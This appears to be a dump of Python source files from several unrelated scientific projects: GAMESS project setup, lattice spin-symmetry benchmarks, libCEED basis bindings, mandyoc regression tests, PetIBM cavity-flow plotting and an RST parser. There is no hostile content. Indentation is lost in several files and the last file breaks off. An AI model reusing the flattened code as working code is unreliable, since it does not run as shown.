A directory string (including the final `/`) that will be used as
the head of project directory tree.
make_inputs: boolean True/False [Optional]
if True then new_project will call input_builder at the end.
Notes 1
----------
If the molecules you wish to build are not already defined in the
general autogamess coordinate dictionary, then initial_coords_dict
must be passed.
To see the autogamess coordianate dictionary simply print out
>>> ag.dictionaries.molecule_dictionary
Returns
----------
This function returns nothing
Notes 2
----------
The format of the spawned directory tree is as follows:
maindir
|
title
-------------------------------------
| | | | |
Codes Inps Logs Batch_Files Spreadsheets
| | | |
--------- Block ----------- 1 file per specie
| | | | |
Text_Files Scripts Fail Pass Sorted
| | |
------- Block 1 directory per specie
| |
Unsolved Solved
Sections in directory tree labled 'Block' are directory trees with the
following format:
1 directory per run type
|
1 directory per specie
Examples
----------
>>> import autogamess as ag
>>>
>>> csvfile = './input.csv'
>>> maindir = './'
>>> title = 'Project Title/'
>>>
>>> ag.new_project(maindir, csvfile, title=title)
>>>
"""
#Spreadsheet header phrase
version = (' AutoGAMESS Version ' +
str(pkg_resources.require("autogamess")[0].version) )
author = ' by <NAME>'
#Defining directory names
unsolved = maindir + title + 'Logs/Fail/Unsolved/'
solved = maindir + title + 'Logs/Fail/Solved/'
xldir = maindir + title + 'Spreadsheets/'
inputs = maindir + title + 'Inps/'
goodlogs = maindir + title + 'Logs/Pass/'
sorrted = maindir + title + 'Logs/Sorted/'
#Define random commands
fin = '\nBREAK\n'
engine = 'xlsxwriter'
xlsx = '.xlsx'
#Make directories
try:
os.makedirs(unsolved)
os.makedirs(solved)
os.makedirs(xldir)
except:
sys.exit("Project Directory or sub-directories already exist")
#Read in csv file or Pandas DataFrame
df = check_data_type(csvfile)
#Make lists of species, run-types, basis_sets, theories
runtyps = [str(x) + '/' for x in list(df['Run Types'].dropna())]
species = [str(x) + '/' for x in list(df['Species'].dropna())]
theories = list(df['Theory'].dropna())
basis_sets = list(df['Basis Sets'].dropna()) + list(
df['External Basis Sets'].dropna())
#Make Block directory trees
for runtyp in runtyps:
for specie in species:
os.makedirs(inputs+runtyp+specie)
os.makedirs(goodlogs+runtyp+specie)
#Make data for Spreadsheets
theo = []
for theory in theories:
temp = [theory]*len(basis_sets)
theo += temp + ['\n', '\n','\n']
bs = (basis_sets + ['\n', '\n','\n']) *len(theories)
#Make dataframe with basis sets names only
data = {'Theory': theo, 'Basis Set': bs}
df2 = pd.DataFrame(data=data)
    #More directory making and Excel workbook and sheet making
for specie in species:
os.makedirs(sorrted+specie)
#Define header for Spreadsheets
header = [version, author, '',
'Project Name : ' + title.replace('/', ''),
'Molecule Name: ' + specie.replace('/', '')]
        #Define Excel filename
xlfilename = xldir + specie.replace('/', xlsx)
#Initialize writer
writer = pd.ExcelWriter(xlfilename, engine=engine)
#Make Sheets and put headers on them all
for runtyp in runtyps:
#Define sheet name and make it
sheet = runtyp.replace('/', '')
df2.to_excel(writer, startrow=6, startcol=0, sheet_name=sheet)
worksheet = writer.sheets[sheet]
#Write Header
for line in header:
i = header.index(line)
worksheet.write(i, 0, line)
        #Save Excel file
writer.save()
#Run Input Builder function
if make_inputs is True:
save_dir = inputs
input_builder(csvfile, save_dir, initial_coords_dict,
proj_title = title.replace('/', '\n'))
return
```
|
{
"source": "jedbrown/lattice-symmetries",
"score": 2
}
|
#### File: lattice-symmetries/benchmark/systems.py
```python
import sys
import os
import time
from loguru import logger
import numpy as np
try:
import lattice_symmetries as ls
except ImportError:
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "python"))
import lattice_symmetries as ls
def get_processor_name():
import subprocess
import json
result = subprocess.run(["lscpu", "-J"], check=False, capture_output=True)
if result.returncode != 0:
        logger.warning(
"Failed to get processor name: {} returned error code {}: {}",
result.args,
result.returncode,
result.stderr,
)
return None
for obj in json.loads(result.stdout)["lscpu"]:
if obj["field"].startswith("Model name"):
return obj["data"]
def square_lattice_symmetries(L_x, L_y, sectors=dict()):
assert L_x > 0 and L_y > 0
sites = np.arange(L_y * L_x, dtype=np.int32)
x = sites % L_x
y = sites // L_x
symmetries = []
if L_x > 1:
T_x = (x + 1) % L_x + L_x * y # translation along x-direction
symmetries.append(("T_x", T_x, sectors.get("T_x", 0)))
P_x = (L_x - 1 - x) + L_x * y # reflection over y-axis
symmetries.append(("P_x", P_x, sectors.get("P_x", 0)))
if L_y > 1:
T_y = x + L_x * ((y + 1) % L_y) # translation along y-direction
symmetries.append(("T_y", T_y, sectors.get("T_y", 0)))
P_y = x + L_x * (L_y - 1 - y) # reflection around x-axis
symmetries.append(("P_y", P_y, sectors.get("P_y", 0)))
if L_x == L_y and L_x > 1: # Rotations are valid only for square samples
R = np.rot90(sites.reshape(L_y, L_x), k=-1).reshape(-1)
symmetries.append(("R", R, sectors.get("R", 0)))
if L_x * L_y % 2 == 0:
symmetries.append(("I", None, sectors.get("I", 0)))
return symmetries
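
# Example (illustrative): on a 2x2 lattice the permutations generated above are
#   T_x = [1, 0, 3, 2] and T_y = [2, 3, 0, 1],
# i.e. each site maps to its periodic neighbour along x or y.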
def square_lattice_edges(L_x, L_y):
assert L_x > 0 and L_y > 0
# Example 4x6 square to illustrate the ordering of sites:
# [[ 0, 1, 2, 3, 4, 5],
# [ 6, 7, 8, 9, 10, 11],
# [12, 13, 14, 15, 16, 17],
# [18, 19, 20, 21, 22, 23]])
sites = np.arange(L_y * L_x, dtype=np.int32).reshape(L_y, L_x)
def generate_nearest_neighbours():
for y in range(L_y):
for x in range(L_x):
if L_x > 1:
yield (sites[y, x], sites[y, (x + 1) % L_x])
if L_y > 1:
yield (sites[y, x], sites[(y + 1) % L_y, x])
def generate_next_nearest_neighbours():
if L_x == 1 or L_y == 1:
return
for y in range(L_y):
for x in range(L_x):
yield (sites[y, x], sites[(y + 1) % L_y, (x + L_x - 1) % L_x])
yield (sites[y, x], sites[(y + 1) % L_y, (x + 1) % L_x])
return list(generate_nearest_neighbours()), list(generate_next_nearest_neighbours())
def _quspin_make_basis(symmetries, number_spins, hamming_weight=None, build=True, **kwargs):
import quspin.basis
def transform(t):
x0, x1, x2 = t
if x1 is None:
return (x0, (-(np.arange(number_spins, dtype=np.int32) + 1), x2))
return x0, (x1, x2)
basis = quspin.basis.spin_basis_general(
N=number_spins,
Nup=hamming_weight,
make_basis=build,
**kwargs,
**dict(transform(s) for s in symmetries)
)
return basis
def _ls_make_basis(symmetries, number_spins, hamming_weight=None, build=True):
spin_inversion = None
processed_symmetries = []
for s in symmetries:
_, x1, x2 = s
if x1 is None:
assert x2 == 0 or x2 == 1
spin_inversion = 1 if x2 == 0 else -1
else:
processed_symmetries.append(ls.Symmetry(x1, sector=x2))
group = ls.Group(processed_symmetries)
logger.info("Symmetry group contains {} elements", len(group))
basis = ls.SpinBasis(
group,
number_spins=number_spins,
hamming_weight=hamming_weight,
spin_inversion=spin_inversion,
)
if build:
basis.build()
return basis
def make_basis(*args, backend="ls", **kwargs):
if backend == "ls":
return _ls_make_basis(*args, **kwargs)
elif backend == "quspin":
return _quspin_make_basis(*args, **kwargs)
else:
raise ValueError("invalid backend: {}; expected either 'ls' or 'quspin'".format(backend))
def _quspin_make_heisenberg(basis, nearest, next_nearest=None, j2=None, dtype=np.float64, matrix=False):
from quspin.operators import quantum_LinearOperator, hamiltonian
static = [
["+-", [[0.5, i, j] for (i, j) in nearest]],
["-+", [[0.5, i, j] for (i, j) in nearest]],
["zz", [[1.0, i, j] for (i, j) in nearest]],
]
if next_nearest is not None:
assert j2 is not None
static += [
["+-", [[0.5 * j2, i, j] for (i, j) in next_nearest]],
["-+", [[0.5 * j2, i, j] for (i, j) in next_nearest]],
["zz", [[1.0 * j2, i, j] for (i, j) in next_nearest]],
]
if matrix:
return hamiltonian(static, [], basis=basis, dtype=dtype)
return quantum_LinearOperator(static, basis=basis, dtype=dtype)
def _ls_make_heisenberg(basis, nearest, next_nearest=None, j2=None, dtype=None):
    # Use an ndarray so that ``j2 * matrix`` below scales elementwise
    # (multiplying a plain Python list by a float would fail).
    matrix = np.array([[1, 0, 0, 0], [0, -1, 2, 0], [0, 2, -1, 0], [0, 0, 0, 1]])
interactions = [ls.Interaction(matrix, nearest)]
if next_nearest is not None:
assert j2 is not None
interactions.append(ls.Interaction(j2 * matrix, next_nearest))
return ls.Operator(basis, interactions)
def make_heisenberg(*args, backend="ls", **kwargs):
if backend == "ls":
return _ls_make_heisenberg(*args, **kwargs)
elif backend == "quspin":
return _quspin_make_heisenberg(*args, **kwargs)
else:
raise ValueError("invalid backend: {}; expected either 'ls' or 'quspin'".format(backend))
```
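Taken together, these helpers build a symmetry-adapted basis and a Heisenberg operator. A minimal usage sketch follows; the parameter choices are illustrative, and it assumes the helpers above are importable and that the `lattice_symmetries` package is installed:
```python
# Illustrative parameters; assumes the helpers above are in scope and
# that the lattice_symmetries package is installed.
import numpy as np
import lattice_symmetries as ls
L_x, L_y = 4, 4
symmetries = square_lattice_symmetries(L_x, L_y, sectors={"T_x": 0, "T_y": 0})
nearest, next_nearest = square_lattice_edges(L_x, L_y)
basis = make_basis(symmetries, L_x * L_y,
                   hamming_weight=(L_x * L_y) // 2, backend="ls")
hamiltonian = make_heisenberg(basis, nearest, next_nearest=next_nearest,
                              j2=0.5, backend="ls")
# Apply the operator to a random block vector, as in the benchmark below.
x = np.asfortranarray(0.5 - np.random.rand(basis.number_states, 1))
y = hamiltonian(x)
```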
#### File: lattice-symmetries/profile/main.py
```python
import time
import numpy as np
import lattice_symmetries as ls
def make_basis(L_x, L_y, sectors=dict()):
assert L_x > 0 and L_y > 0
sites = np.arange(L_y * L_x, dtype=np.int32)
x = sites % L_x
y = sites // L_x
symmetries = []
if L_x > 1:
T_x = (x + 1) % L_x + L_x * y # translation along x-direction
symmetries.append(("T_x", T_x, sectors.get("T_x", 0)))
P_x = (L_x - 1 - x) + L_x * y # reflection over y-axis
symmetries.append(("P_x", P_x, sectors.get("P_x", 0)))
if L_y > 1:
T_y = x + L_x * ((y + 1) % L_y) # translation along y-direction
symmetries.append(("T_y", T_y, sectors.get("T_y", 0)))
P_y = x + L_x * (L_y - 1 - y) # reflection around x-axis
symmetries.append(("P_y", P_y, sectors.get("P_y", 0)))
if L_x == L_y and L_x > 1: # Rotations are valid only for square samples
R = np.rot90(sites.reshape(L_y, L_x), k=-1).reshape(-1)
symmetries.append(("R", R, sectors.get("R", 0)))
if L_x * L_y % 2 == 0:
symmetries.append(("I", None, sectors.get("I", 0)))
hamming_weight = (L_x * L_y) // 2
spin_inversion = None
processed_symmetries = []
for s in symmetries:
_, x1, x2 = s
if x1 is None:
assert x2 == 0 or x2 == 1
spin_inversion = 1 if x2 == 0 else -1
else:
processed_symmetries.append(ls.Symmetry(x1, sector=x2))
group = ls.Group(processed_symmetries)
basis = ls.SpinBasis(
group,
number_spins=L_x * L_y,
hamming_weight=hamming_weight,
spin_inversion=spin_inversion,
)
basis.build()
return basis
def make_operator(L_x, L_y, basis):
assert L_x > 0 and L_y > 0
sites = np.arange(L_y * L_x, dtype=np.int32).reshape(L_y, L_x)
def generate_nearest_neighbours():
for y in range(L_y):
for x in range(L_x):
if L_x > 1:
yield (sites[y, x], sites[y, (x + 1) % L_x])
if L_y > 1:
yield (sites[y, x], sites[(y + 1) % L_y, x])
def generate_next_nearest_neighbours():
if L_x == 1 or L_y == 1:
return
for y in range(L_y):
for x in range(L_x):
yield (sites[y, x], sites[(y + 1) % L_y, (x + L_x - 1) % L_x])
yield (sites[y, x], sites[(y + 1) % L_y, (x + 1) % L_x])
edges = list(generate_nearest_neighbours())
matrix = np.array(
[[1, 0, 0, 0], [0, -1, 2, 0], [0, 2, -1, 0], [0, 0, 0, 1]], dtype=np.complex128
)
operator = ls.Operator(basis, [ls.Interaction(matrix, edges)])
return operator
def do_benchmark(L_x, L_y):
basis = make_basis(L_x, L_y)
operator = make_operator(L_x, L_y, basis)
block_size = 1
n = basis.number_states
x = 0.5 - np.random.rand(n, block_size)
x = np.asfortranarray(x)
tick = time.time()
for _ in range(10):
x = operator(x)
tock = time.time()
print(tock - tick)
def main():
do_benchmark(6, 4)
if __name__ == "__main__":
main()
```
|
{
"source": "jedbrown/libCEED",
"score": 2
}
|
#### File: libCEED/python/ceed_basis.py
```python
from _ceed_cffi import ffi, lib
import tempfile
import numpy as np
from abc import ABC
from .ceed_constants import TRANSPOSE, NOTRANSPOSE
# ------------------------------------------------------------------------------
class Basis(ABC):
"""Ceed Basis: finite element basis objects."""
# Representation
def __repr__(self):
return "<CeedBasis instance at " + hex(id(self)) + ">"
# String conversion for print() to stdout
def __str__(self):
"""View a Basis via print()."""
# libCEED call
with tempfile.NamedTemporaryFile() as key_file:
with open(key_file.name, 'r+') as stream_file:
stream = ffi.cast("FILE *", stream_file)
err_code = lib.CeedBasisView(self._pointer[0], stream)
self._ceed._check_error(err_code)
stream_file.seek(0)
out_string = stream_file.read()
return out_string
# Apply Basis
def apply(self, nelem, emode, u, v, tmode=NOTRANSPOSE):
"""Apply basis evaluation from nodes to quadrature points or vice versa.
Args:
nelem: the number of elements to apply the basis evaluation to;
the backend will specify the ordering in a
BlockedElemRestriction
emode: basis evaluation mode
u: input vector
v: output vector
**tmode: CEED_NOTRANSPOSE to evaluate from nodes to quadrature
points, CEED_TRANSPOSE to apply the transpose, mapping
from quadrature points to nodes; default CEED_NOTRANSPOSE"""
# libCEED call
err_code = lib.CeedBasisApply(self._pointer[0], nelem, tmode, emode,
u._pointer[0], v._pointer[0])
self._ceed._check_error(err_code)
# Transpose a Basis
@property
def T(self):
"""Transpose a Basis."""
return TransposeBasis(self)
# Transpose a Basis
@property
def transpose(self):
"""Transpose a Basis."""
return TransposeBasis(self)
# Get number of nodes
def get_num_nodes(self):
"""Get total number of nodes (in dim dimensions) of a Basis.
Returns:
num_nodes: total number of nodes"""
# Setup argument
p_pointer = ffi.new("CeedInt *")
# libCEED call
err_code = lib.CeedBasisGetNumNodes(self._pointer[0], p_pointer)
self._ceed._check_error(err_code)
return p_pointer[0]
# Get number of quadrature points
def get_num_quadrature_points(self):
"""Get total number of quadrature points (in dim dimensions) of a Basis.
Returns:
num_qpts: total number of quadrature points"""
# Setup argument
q_pointer = ffi.new("CeedInt *")
# libCEED call
err_code = lib.CeedBasisGetNumQuadraturePoints(
self._pointer[0], q_pointer)
self._ceed._check_error(err_code)
return q_pointer[0]
# Destructor
def __del__(self):
# libCEED call
err_code = lib.CeedBasisDestroy(self._pointer)
self._ceed._check_error(err_code)
# ------------------------------------------------------------------------------
class BasisTensorH1(Basis):
"""Ceed Tensor H1 Basis: finite element tensor-product basis objects for
H^1 discretizations."""
# Constructor
def __init__(self, ceed, dim, ncomp, P1d, Q1d, interp1d, grad1d,
qref1d, qweight1d):
# Setup arguments
self._pointer = ffi.new("CeedBasis *")
self._ceed = ceed
        # Cast the NumPy arrays' data pointers for the libCEED call;
        # the arrays must remain alive while the call executes.
        interp1d_pointer = ffi.cast(
            "CeedScalar *",
            interp1d.__array_interface__['data'][0])
        grad1d_pointer = ffi.cast(
            "CeedScalar *",
            grad1d.__array_interface__['data'][0])
        qref1d_pointer = ffi.cast(
            "CeedScalar *",
            qref1d.__array_interface__['data'][0])
        qweight1d_pointer = ffi.cast(
            "CeedScalar *",
            qweight1d.__array_interface__['data'][0])
# libCEED call
err_code = lib.CeedBasisCreateTensorH1(self._ceed._pointer[0], dim, ncomp,
P1d, Q1d, interp1d_pointer,
grad1d_pointer, qref1d_pointer,
qweight1d_pointer, self._pointer)
self._ceed._check_error(err_code)
# Get 1D interpolation matrix
def get_interp_1d(self):
"""Return 1D interpolation matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nnodes_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumNodes1D(self._pointer[0], nnodes_pointer)
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nnodes_pointer[0] * nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetInterp1D(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# Get 1D gradient matrix
def get_grad_1d(self):
"""Return 1D gradient matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nnodes_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumNodes1D(self._pointer[0], nnodes_pointer)
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nnodes_pointer[0] * nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetGrad1D(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# Get 1D quadrature weights matrix
def get_q_weight_1d(self):
"""Return 1D quadrature weights matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetQWeights(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# Get 1D quadrature points matrix
def get_q_ref_1d(self):
"""Return 1D quadrature points matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetQRef(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# ------------------------------------------------------------------------------
class BasisTensorH1Lagrange(BasisTensorH1):
"""Ceed Tensor H1 Lagrange Basis: finite element tensor-product Lagrange basis
objects for H^1 discretizations."""
# Constructor
def __init__(self, ceed, dim, ncomp, P, Q, qmode):
# Setup arguments
self._pointer = ffi.new("CeedBasis *")
self._ceed = ceed
# libCEED call
err_code = lib.CeedBasisCreateTensorH1Lagrange(self._ceed._pointer[0], dim,
ncomp, P, Q, qmode, self._pointer)
self._ceed._check_error(err_code)
# ------------------------------------------------------------------------------
class BasisH1(Basis):
"""Ceed H1 Basis: finite element non tensor-product basis for H^1 discretizations."""
# Constructor
def __init__(self, ceed, topo, ncomp, nnodes,
nqpts, interp, grad, qref, qweight):
# Setup arguments
self._pointer = ffi.new("CeedBasis *")
self._ceed = ceed
        # Cast the NumPy arrays' data pointers for the libCEED call;
        # the arrays must remain alive while the call executes.
        interp_pointer = ffi.cast(
            "CeedScalar *",
            interp.__array_interface__['data'][0])
        grad_pointer = ffi.cast(
            "CeedScalar *",
            grad.__array_interface__['data'][0])
        qref_pointer = ffi.cast(
            "CeedScalar *",
            qref.__array_interface__['data'][0])
        qweight_pointer = ffi.cast(
            "CeedScalar *",
            qweight.__array_interface__['data'][0])
# libCEED call
        err_code = lib.CeedBasisCreateH1(self._ceed._pointer[0], topo, ncomp,
                                         nnodes, nqpts, interp_pointer,
                                         grad_pointer, qref_pointer,
                                         qweight_pointer, self._pointer)
        self._ceed._check_error(err_code)
# ------------------------------------------------------------------------------
class TransposeBasis():
"""Transpose Ceed Basis: transpose of finite element tensor-product basis objects."""
# Attributes
_basis = None
# Constructor
def __init__(self, basis):
# Reference basis
self._basis = basis
# Representation
def __repr__(self):
return "<Transpose CeedBasis instance at " + hex(id(self)) + ">"
# Apply Transpose Basis
def apply(self, nelem, emode, u, v):
"""Apply basis evaluation from quadrature points to nodes.
Args:
nelem: the number of elements to apply the basis evaluation to;
the backend will specify the ordering in a
                   BlockedElemRestriction
           emode: basis evaluation mode
u: input vector
v: output vector"""
# libCEED call
self._basis.apply(nelem, emode, u, v, tmode=TRANSPOSE)
# ------------------------------------------------------------------------------
```
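A hedged usage sketch for the classes above. It assumes the parent `libceed` package exposes a `Ceed` handle whose factory methods forward to these constructors (as the `self._ceed._pointer` plumbing suggests); the exact entry point may differ:
```python
# Hypothetical entry point: assumes the parent package exposes a Ceed
# handle with factory methods forwarding to the classes above.
import libceed
ceed = libceed.Ceed("/cpu/self")
# 1D H^1 Lagrange basis: 1 component, P=4 nodes, Q=4 quadrature points.
basis = ceed.BasisTensorH1Lagrange(1, 1, 4, 4, libceed.GAUSS)
print(basis)                    # pretty-printed via CeedBasisView
interp = basis.get_interp_1d()  # read-only NumPy view of the 1D matrix
```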
|
{
"source": "jedbrown/mandyoc",
"score": 2
}
|
#### File: mandyoc/tests/testing_results.py
```python
import os
import pytest
import numpy as np
import numpy.testing as npt
from pathlib import Path
# Test path
base_path = Path(os.path.realpath(os.path.abspath(__file__))).parent
scenarios = [
"vanKeken1997_case1a",
"Crameri2012_case2",
"continental_rift",
]
# Name of the files to compare
fields = [
"time",
"density",
"heat",
"pressure",
"strain",
"strain_rate",
"sp_surface_global",
"temperature",
"velocity",
"viscosity",
"step_0",
"step_1",
]
# steps to compare
steps = [0, 1]
def read(filename):
"""
Read the file
"""
if "time" not in filename.name:
args = dict(unpack=True, comments="P", skiprows=2)
else:
args = dict(unpack=True, delimiter=":", usecols=1)
data = np.loadtxt(filename, **args)
return data
@pytest.mark.parametrize("step", steps)
@pytest.mark.parametrize("field", fields)
@pytest.mark.parametrize("scenario", scenarios)
def test_result(scenario, field, step):
"""Run tests"""
if scenario != 'Crameri2012_case2' and field == 'sp_surface_global':
pytest.skip('No sp_surface_global for this scenario')
if scenario == 'Crameri2012_case2' and step == 1:
pytest.skip('Tested with only one processor')
    test_path = base_path / "data" / scenario / "output"
    expected_path = base_path / "data" / scenario / "expected"
    filename = f"{field}_{step}.txt"
output = read(test_path / filename)
expected = read(expected_path / filename)
npt.assert_allclose(output, expected, rtol=2e-4, atol=1.0e-18)
```
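For reference, a small sketch of the two file layouts `read` distinguishes; the file contents are hypothetical and only illustrate the `numpy.loadtxt` arguments used above:
```python
# Hypothetical file contents, illustrating the loadtxt arguments above.
import io
import numpy as np
time_like = io.StringIO("step: 0\ntime: 1.5\n")
print(np.loadtxt(time_like, unpack=True, delimiter=":", usecols=1))  # [0.  1.5]
field_like = io.StringIO("header\nheader\n1.0 2.0\n3.0 4.0\n")
print(np.loadtxt(field_like, unpack=True, comments="P", skiprows=2))
```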
|
{
"source": "jedbrown/PetIBM",
"score": 3
}
|
#### File: liddrivencavity2dRe3200/scripts/plotCenterlineVelocities.py
```python
import os
import numpy
import h5py
from matplotlib import pyplot
# User's parameters
Re = 3200.0 # Reynolds number
time_step = 25000 # Time step at which to read the solution
# End of user's parameters
if not os.environ.get('PETIBM_EXAMPLES'):
raise KeyError('Environment variable PETIBM_EXAMPLES is not set; '
'Set PETIBM_EXAMPLES as the root directory of the examples.')
script_dir = os.path.dirname(os.path.realpath(__file__))
simu_dir = os.sep.join(script_dir.split(os.sep)[:-1])
root_dir = os.environ['PETIBM_EXAMPLES']
def get_gridline_velocity(x_target, u, x, axis=0):
i = numpy.where(x < x_target)[0][-1]
x_a, x_b = x[i], x[i + 1]
if axis == 0:
u_a, u_b = u[:, i], u[:, i + 1]
elif axis == 1:
u_a, u_b = u[i], u[i + 1]
return (u_a * (x_b - x_target) + u_b * (x_target - x_a)) / (x_b - x_a)
def read_data_ghia_et_al_1982(filepath, Re):
with open(filepath, 'r') as infile:
data = numpy.loadtxt(infile, dtype=numpy.float64, unpack=True)
re2col = {100.0: (1, 7), 1000.0: (2, 8), 3200.0: (3, 9), 5000.0: (4, 10),
10000.0: (5, 11)}
return {'vertical': {'y': data[0], 'u': data[re2col[Re][0]]},
'horizontal': {'x': data[6], 'v': data[re2col[Re][1]]}}
def read_field_hdf5(name, fieldpath, gridpath):
field = {}
f = h5py.File(gridpath, 'r')
field['x'], field['y'] = f[name]['x'][:], f[name]['y'][:]
f = h5py.File(fieldpath, 'r')
field['values'] = f[name][:]
return field
# Reads data from Ghia et al. (1982).
filepath = os.path.join(root_dir, 'data',
'ghia_et_al_1982_lid_driven_cavity.dat')
ghia = read_data_ghia_et_al_1982(filepath, Re)
# Reads gridlines and velocity fields.
gridpath = os.path.join(simu_dir, 'grid.h5')
filepath = os.path.join(simu_dir, 'solution', '{:0>7}.h5'.format(time_step))
u = read_field_hdf5('u', filepath, gridpath)
v = read_field_hdf5('v', filepath, gridpath)
# Computes x-velocity along vertical gridline at mid-cavity.
x_target = 0.5
u['vertical'] = get_gridline_velocity(x_target, u['values'], u['x'], axis=0)
# Computes y-velocity along horizontal gridline at mid-cavity.
y_target = 0.5
v['horizontal'] = get_gridline_velocity(y_target, v['values'], v['y'], axis=1)
# Plots the centerline velocities.
pyplot.style.use('seaborn-dark')
simu_kwargs = {'label': 'PetIBM',
'color': '#336699', 'linestyle': '-', 'linewidth': 3,
'zorder': 10}
ghia_kwargs = {'label': 'Ghia et al. (1982)',
'color': '#993333', 'linewidth': 0,
'markeredgewidth': 2, 'markeredgecolor': '#993333',
'markerfacecolor': 'none',
'marker': 'o', 'markersize': 8,
'zorder': 10}
fig, ax = pyplot.subplots(2, figsize=(8, 8))
fig.suptitle('Re = {}'.format(int(Re)), fontname='DejaVu Serif', fontsize=16)
ax[0].grid(True, zorder=0)
ax[0].set_xlabel('y', fontname='DejaVu Serif', fontsize=16)
ax[0].set_ylabel('u (x={})'.format(x_target),
fontname='DejaVu Serif', fontsize=16)
ax[0].plot(u['y'], u['vertical'], **simu_kwargs)
ax[0].plot(ghia['vertical']['y'], ghia['vertical']['u'], **ghia_kwargs)
ax[0].axis([0.0, 1.0, -0.75, 1.25])
ax[0].legend(loc='upper left', prop={'size': 14})
ax[1].grid(True, zorder=0)
ax[1].set_xlabel('x', fontname='DejaVu Serif', fontsize=16)
ax[1].set_ylabel('v (y={})'.format(y_target),
fontname='DejaVu Serif', fontsize=16)
ax[1].plot(v['x'], v['horizontal'], **simu_kwargs)
ax[1].plot(ghia['horizontal']['x'], ghia['horizontal']['v'], **ghia_kwargs)
ax[1].axis([0.0, 1.0, -0.75, 1.25])
ax[1].legend(loc='upper left', prop={'size': 14})
for a in ax:
for method in ['get_xticklabels', 'get_yticklabels']:
for label in getattr(a, method)():
label.set_fontname('DejaVu Serif')
label.set_fontsize(14)
# Saves figure
figures_dir = os.path.join(simu_dir, 'figures')
if not os.path.isdir(figures_dir):
os.makedirs(figures_dir)
filename = 'centerlineVelocities{:0>7}.png'.format(time_step)
filepath = os.path.join(figures_dir, filename)
fig.savefig(filepath)
```
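A standalone check of the bracketing interpolation in `get_gridline_velocity`, run on synthetic data (not part of the PetIBM example):
```python
# Synthetic data: u = 10 * x sampled on four gridlines.
import numpy
x = numpy.array([0.0, 0.4, 0.8, 1.2])
u = numpy.array([[0.0, 4.0, 8.0, 12.0]])
u_mid = get_gridline_velocity(0.5, u, x, axis=0)
print(u_mid)  # [5.], the linear interpolant between x=0.4 and x=0.8
```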
|
{
"source": "jedbrown/rst-to-myst",
"score": 3
}
|
#### File: rst-to-myst/rst_to_myst/nodes.py
```python
from typing import Any, List, Tuple
from docutils import nodes
class UnprocessedText(nodes.Text):
"""Text that should not be processed in any way (e.g. escaping characters)."""
class EvalRstNode(nodes.Element):
"""Should contain a single ``Text`` node with the contents to wrap."""
class RoleNode(nodes.Element):
pass
class DirectiveNode(nodes.Element):
"""This node will have an optional ``ArgumentNode`` and/or ``ContentNode`` child."""
def __init__(
self,
rawsource,
*,
name: str,
module: str,
conversion: str,
options_list: List[Tuple[str, Any]],
**kwargs
) -> None:
super().__init__(
rawsource,
name=name,
module=module,
conversion=conversion,
options_list=options_list,
**kwargs
)
class ArgumentNode(nodes.Element):
"""The parsed argument of a directive."""
class ContentNode(nodes.Element):
"""The parsed content of a directive."""
class FrontMatterNode(nodes.Element):
"""Contains the first field list in the document."""
```
#### File: rst-to-myst/rst_to_myst/parser.py
```python
from io import StringIO
from typing import Tuple
import yaml
from docutils import nodes
from docutils.frontend import OptionParser
from docutils.parsers.rst import Parser
from docutils.transforms import Transform
from docutils.transforms.references import (
AnonymousHyperlinks,
Footnotes,
PropagateTargets,
)
from docutils.utils import new_document, roman
try:
from importlib.resources import files
except ImportError:
from importlib_resources import files
from . import data as package_data
from .inliner import InlinerMyst
from .namespace import compile_namespace
from .nodes import FrontMatterNode
from .states import get_state_classes
class LosslessRSTParser(Parser):
"""Modified RST Parser, allowing for the retrieval of the original source text.
Principally, roles and directives are not run.
"""
def __init__(self):
self.initial_state = "Body"
self.state_classes = get_state_classes()
for state_class in self.state_classes:
# flush any cached states from the last parse
state_class.nested_sm_cache = []
self.inliner = InlinerMyst()
class IndirectHyperlinks(Transform):
"""Resolve indirect hyperlinks."""
def apply(self):
for target in self.document.indirect_targets:
if not target.resolved:
self.resolve_indirect_target(target) # TODO implement this resolve?
# Do not resolve the actual references, since this replaces the "refname"
# self.resolve_indirect_references(target)
class StripFootnoteLabel(Transform):
"""Footnotes and citations can start with a label note, which we do not need."""
def apply(self):
